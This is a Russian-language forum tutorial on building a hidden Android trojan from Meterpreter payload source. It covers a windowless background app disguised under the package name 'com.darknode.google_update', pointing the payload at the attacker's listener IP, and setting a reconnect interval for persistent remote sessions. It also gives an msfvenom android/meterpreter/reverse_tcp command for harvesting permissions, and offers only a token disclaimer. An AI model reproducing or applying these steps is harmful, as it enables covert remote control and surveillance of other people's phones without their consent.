Приветствую. Вся инфа в ознокомительных целях, автор не несет ответственности за область ее применения! Сегодня будем учиться делать скрытый троян|бекдор на андроид средствами разработки на Android Studio и используя исходник от Android Meterpreter Payload с дальнейшим закреплением в системе. нам понадобится: https://developer.android.com/studio/index.html https://github.com/giovannicolonna/msfvenom-backdoor-android Первый этап (Подготовительный): Качаем SourceCode(исходник) метерпретора под андроид,ставим андроид студию и SDK (При установке SDK вы можете скачать пакеты AVD(Аndroid Virtual Device|Аднроид эмуляторов) для тестирования приложения на эмулированом устройстве,но как по мне то эти эмуляторы очень таки медленные и лучше тестировать на своем реальном девайсе или же использовать другой эмулятор (например genymotion или образы андроида для виртуалок) Ссылки на то как настроить студию с генимоушн или физическим девайсом я кину в конце статьи и в описания видео. Ну я уже все скачал. Показывать процесс установки не буду. Запускаем студию,создаем проект,даем ему имя. Выбираем минимальную версию API андроида,я выбрал IceCreamSandwich 4.0 так как http://telegra.ph/file/673bc9ec8d02ce3b90192.png http://telegra.ph/file/606533333319ead54ec42.png это самая распространенная версия Android по статистике разработчиков. Выбираем приложения без активити (activity) -- это означает что при запуске не будет никаких визуальных окон (activity) и приложения просто запуститься себе и будет висеть в фоне. http://telegra.ph/file/eaa42a9f74b916b17b8ea.png На этом подготовительный этап завершен Второй этап (Базовые настройки пейлоада) Открываем наш проект в студии. http://telegra.ph/file/7080130f07557ac8be1c0.png Далее распаковываем скаченный архив с гитхаба с исходниками метерпретера. Находим там папку \backdooredapk\ где лежат наши java файлы и перетаскиваем их в наш проект в андроид студии. http://telegra.ph/file/84d8a603c271e7e96e46b.png Далее первым шагом же изменим в файле payload.java ip адрес нашего листенера(нашей атакующей машины,где у нас запущен метаслоит) http://telegra.ph/file/9d73f4387e07f4843bcc5.png Затем нам будет интересен файл MyIntentService.java,в котором мы сможем опционально задать интервал времени через которое наш бекдор будет конектиться к машине атакуищего. (long half_an_hour = (3600)/(2); //время в секундах между каждой попыткой открыть новую meterpreter сессию " Я для демонстрации поставлю минуту" ) http://telegra.ph/file/f5d0a3ade74f84b744fff.png Далее нам понадобится AndroidManifest.xml из архива. Возьмем от туда пользовательские разрешение (user.permisions) и все что между тегами <application></application> После того как мы копипасним пермишенс и апликейшн нам нужно будет опционально изменить(указать) имя активити(<activiyt>android:name) и имя службы(<Service>android:name) http://telegra.ph/file/a1462d4a11e530266e01a.png http://telegra.ph/file/e9be27fb9b46ff197755b.png Хотя студия сама нам это покажет что не нашла пути которое по дефолту был в тегах активити и сервиса(выделит их красным цветом). Нужно заменить их (stage.metasploit.com на com.darknode.google_update в моем случае "путь(имя) к вашему проекту") http://telegra.ph/file/5002f2e3e454cb77ce71b.png http://telegra.ph/file/b1fff84ee87ea8f8f8752.png Но в манифесте (AndroidManifest.xml) из архива есть один небольшой косяк.После копипаста его в наш проект нужно добавить права(permisions),так как там не полный нужный нам список прав. Для этого возьмем и реверснем апк созданный с помощью msfvenon: msfvenom -p android/meterpreter/reverse_tcp lhost=айпи lport=порт r > ./meter.apk(хотя айпи и порт можно рандомный,нам нужен только манифест от туда) http://telegra.ph/file/4c30e0e1743f230cdbce4.jpg http://telegra.ph/file/860462def2dce50398c82.jpg Скопируем разрешение с манифеста в наш проект http://telegra.ph/file/b3896ea9fa4f03a060824.png http://telegra.ph/file/db91970874ca910aa286e.png Далее осталось подписать наше приложения. http://telegra.ph/file/df8765dd8a285c1d3bbd5.png http://telegra.ph/file/2fde9ae236807f9153cb8.png Подписали) Ну что ж давайте протестим)) http://telegra.ph/file/708878cbcb6dc6e44a41c.png http://telegra.ph/file/da758d506c5678babd259.jpg http://telegra.ph/file/bdf483a59cc0ed8c635c3.jpg http://telegra.ph/file/153b63e4c31d58498f0cf.jpg http://telegra.ph/file/434502b04b29e9a81a183.jpg Сам проверил, все работает. https://codeby.net/forum/threads/sobiraem-skrytyj-trojan-na-android-persistence-chast-i.58392/